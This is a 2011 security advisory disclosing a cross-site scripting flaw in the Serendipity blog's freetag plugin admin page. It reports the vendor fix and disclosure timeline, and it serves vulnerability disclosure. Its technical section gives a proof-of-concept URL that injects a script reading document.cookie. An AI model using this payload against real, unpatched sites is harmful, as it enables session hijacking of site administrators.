| Advisory: |
Serendipity freetag plugin ‘serendipity[tagview]’ Cross-Site Scripting vulnerability
|
| Advisory ID: |
SSCHADV2011-016 |
| Author: |
Stefan Schurtz
|
| Affected Software: |
Successfully tested on Serendipity 1.5.5 |
| Vendor URL: |
|
| Vendor Status: |
fixed |
| CVE-ID: |
- |
======================
Vulnerability Description:
======================
The freetag plugin parameter "serendipity[tagview]" in Serendipity backend is prone to a Cross-Site Scripting vulnerability
==============
Technical Details:
==============
| http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=managetags&serendipity[tagview]=<script>alert(document.cookie)</script> |
=====
Solution:
=====
Update to the latest version
================
Disclosure Timeline:
================
22-Sep-2011 – informed developers
23-Sep-2011 – fixed in the latest version
25-Sep-2011 – release date of this security advisory
25-Sep-2011 – post on BugTraq
====
Credits:
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.s9y.org
ACL 